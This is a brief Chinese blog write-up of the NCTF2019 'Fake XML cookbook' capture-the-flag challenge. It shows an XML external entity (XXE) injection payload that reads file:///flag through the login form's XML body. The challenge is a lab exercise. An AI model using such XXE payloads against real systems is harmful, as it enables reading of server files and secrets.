[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook

y2DYUIdSm_LDX59b4Ccd9dcvIfcgXpTX25camqcVzZc

打卡环境是一个登录页面,根据题目名字就能看出来和xml有关,和xml有关的那就是注入,brup抓包看下数据包,结果如下:

EJIi98R-a2m7I-OStcEWMW6FbS5ze5rjGwK-WWim6cQ

发现username和password是xml格式,尝试XML外部实体注入得到flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY test SYSTEM "file:///flag">
  ]>
<user><username>&test;</username><password>1</password></user>

54AUo7ctejbiFGBhrHqWc5JAovQ2uxy8CfAGteAVb3w

关于XML注入内容的补充:https://xz.aliyun.com/t/6887#toc-0

posted on 2024-02-08 10:56  跳河离去的鱼  阅读(130)  评论(0)    收藏  举报